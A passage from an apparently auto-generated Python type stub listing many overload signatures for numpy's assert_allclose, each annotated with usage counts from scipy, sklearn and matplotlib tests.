actual: numpy.ndarray,
desired: List[Union[float, int]],
rtol: float,
atol: float,
err_msg: str,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[Union[int, float]],
rtol: float,
atol: float,
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: str,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.int64, desired: numpy.int64, rtol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Union[int, float]]):
"""
usage.matplotlib: 2
usage.scipy: 10
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.complex128):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.float64, atol: float):
"""
usage.scipy: 40
usage.sklearn: 3
"""
...
@overload
def assert_allclose(actual: int, desired: int, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.ndarray],
desired: List[List[Union[int, float]]],
rtol: float,
atol: float,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: List[numpy.ndarray], desired: List[List[float]], rtol: float, atol: float
):
"""
usage.scipy: 7
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[float], err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, err_msg: str):
"""
usage.scipy: 2
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[int, int], atol: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: float, desired: float, atol: float, err_msg: str):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, atol: float, err_msg: str):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.float64, atol: float, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float,
desired: float,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: str,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: float, desired: int, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: str,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[
float, float, float, float, float, float, float, float, float, float
],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: float,
desired: float,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["method bisect"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float,
desired: float,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["method ridder"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: float, rtol: numpy.float64, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: complex, desired: int, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: int):
"""
usage.scipy: 5
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: float, desired: int, rtol: numpy.float64, atol: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: int, rtol: numpy.float64, atol: float
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[Union[float, int]], rtol: float
):
"""
usage.scipy: 5
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[Union[int, float]]], rtol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[complex]):
"""
usage.scipy: 7
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Union[int, complex]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[List[Union[int, float]]],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[int], desired: numpy.ndarray):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: Tuple[int], desired: numpy.ndarray):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(actual: Tuple[int, int, int], desired: numpy.ndarray):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[Union[int, float]], rtol: float
):
"""
usage.scipy: 14
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: int, rtol: float):
"""
usage.scipy: 12
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: float, desired: float, rtol: float):
"""
usage.scipy: 19
usage.sklearn: 9
"""
...
@overload
def assert_allclose(actual: List[numpy.complex128], desired: List[numpy.complex128]):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: int, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[Union[int, numpy.float64]], desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: list, desired: list, rtol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.int64], desired: List[numpy.complex128], rtol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.complex128], desired: List[numpy.complex128], rtol: float
):
"""
usage.scipy: 9
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[int, float], rtol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[int, numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: int, desired: numpy.float64, rtol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float64, rtol: float):
"""
usage.scipy: 2
usage.sklearn: 7
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray],
desired: Tuple[numpy.ndarray, numpy.ndarray],
):
"""
usage.scipy: 10
"""
...
@overload
def assert_allclose(
actual: List[numpy.complex128], desired: List[complex], rtol: float
):
"""
usage.scipy: 24
"""
...
@overload
def assert_allclose(actual: List[numpy.complex128], desired: List[complex]):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: List[numpy.complex128], desired: List[Union[complex, float]], rtol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: List[numpy.complex128], desired: List[Union[complex, int]], rtol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[numpy.ndarray],
err_msg: Literal["bessel(2,...)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["bessel(3,...)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["bessel(4,...)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[numpy.ndarray],
err_msg: Literal["butter(2,...)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["butter(3,...)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["butter(4,...)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[numpy.ndarray],
err_msg: Literal["cheby1(2,...)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["cheby1(3,...)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["cheby1(4,...)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[numpy.ndarray],
err_msg: Literal["cheby2(2,...)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["cheby2(3,...)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["cheby2(4,...)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[numpy.ndarray],
err_msg: Literal["ellip(2,...)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["ellip(3,...)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["ellip(4,...)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[int]], rtol: float):
"""
usage.scipy: 39
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: int, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[Tuple[float]],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: List[numpy.float64], desired: List[numpy.float64]):
"""
usage.matplotlib: 1
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["order=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["order=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["order=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["order=4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["order=5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.float64, rtol: float, atol: int
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 0"]
):
"""
usage.scipy: 7
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 9"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["bartlett, 26"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 128"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
err_msg: Literal["('tukey', 0.5), 64"],
):
"""
usage.scipy: 5
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 255"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 3"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["bartlett, 37"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 127"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
err_msg: Literal["('tukey', 0.5), 14"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 5"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["hann, 128"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 10, 0"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 10, 9"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["bartlett, 51, 26"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 256, 128"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 256, 255"]
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 0, even"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 0, odd"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
err_msg: Literal["boxcar, 0, constant"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 0, zeros"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 9, even"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 9, odd"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
err_msg: Literal["boxcar, 9, constant"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 9, zeros"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
err_msg: Literal["istft transpose plus"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[Union[float, int]], atol: float
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[List[float]],
atol: float,
err_msg: Tuple[int, float, int],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[float],
rtol: float,
atol: float,
err_msg: Tuple[int, float, int],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[List[float]],
atol: float,
err_msg: Tuple[int, int, int],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[float],
rtol: float,
atol: float,
err_msg: Tuple[int, int, int],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[Union[float, int]]], atol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: str,
):
"""
usage.scipy: 10
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: int, atol: numpy.float32):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, atol: numpy.float32):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: int, atol: numpy.float64):
"""
usage.scipy: 7
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["array([1, 1, 1, 1])"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["array([1, 1, 1, 0])"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["array([1, 1, 0, 0])"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["array([1, 0, 0, 0])"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.complex128], desired: Tuple[int, int, int]):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[int, int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[Union[int, float]]]):
"""
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.int64, desired: numpy.float64):
"""
usage.scipy: 5
"""
...
@overload
def assert_allclose(actual: numpy.matrix, desired: numpy.matrix, atol: numpy.float64):
"""
usage.scipy: 13
"""
...
@overload
def assert_allclose(actual: numpy.matrix, desired: numpy.matrix, atol: numpy.float128):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: bool, atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[Union[float, numpy.float64]]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[Union[numpy.float64, int]]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Union[numpy.float64, float]]):
"""
usage.scipy: 2
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Union[int, numpy.float64]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: int, rtol: int, atol: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float, rtol: bool, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: float, rtol: float, err_msg: str):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Tuple[float, float]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: List[numpy.ndarray]):
"""
usage.scipy: 10
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, rtol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[int]]):
"""
usage.scipy: 1
usage.sklearn: 5
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: int, atol: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, rtol: int, atol: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: List[int], desired: numpy.ndarray, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[complex], rtol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.complex128,
rtol: float,
atol: float,
err_msg: Tuple[int, int],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.complex128,
rtol: float,
atol: float,
err_msg: Tuple[int, float],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.complex128,
rtol: float,
atol: float,
err_msg: Tuple[float, float],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.complex128,
rtol: float,
atol: float,
err_msg: Tuple[float, int],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.complex128,
rtol: float,
atol: float,
err_msg: Tuple[numpy.float64, float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.complex128, desired: float):
"""
usage.scipy: 12
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.float64, atol: numpy.float64, err_msg: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
atol: numpy.float64,
err_msg: Tuple[float, float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.complex128,
desired: numpy.complex128,
atol: numpy.float64,
err_msg: Tuple[float, complex],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.float64, rtol: int, atol: numpy.float64
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float64, err_msg: str):
"""
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10.0, 1.0) dd None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1.0, -1.0) dd None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1.0, 1.0) dd None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1.0, 10.0) dd None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1.0, -10.0) dd None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1.0, -1.0) dd None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1.0, 1.0) dd None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1.0, 10.0) dd None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10.0, -1.0) dd None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10.0, 1.0) dd None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10.0, 10.0) dd None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-1.0,) d ['double']"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(1.0,) d ['double']"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(10.0,) d ['double']"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex, complex, complex],
desired: Tuple[
numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128
],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10.0,) d None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1.0,) d None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1.0,) d None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10.0,) d None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1.0,) d ['double']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1.0,) d ['double']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10.0,) d ['double']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: complex, desired: numpy.complex128, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-10.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(1.0, -10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(1.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(1.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(1.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(10.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(10.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(10.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10, -10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10, -1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10, 1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10, 10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1, -10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1, -1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1, 1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1, 10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1, -10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1, -1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1, 1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1, 10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10, -10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10, -1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10, 1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10, 10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10.0,) f ['float']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1.0,) f ['float']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1.0,) f ['float']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
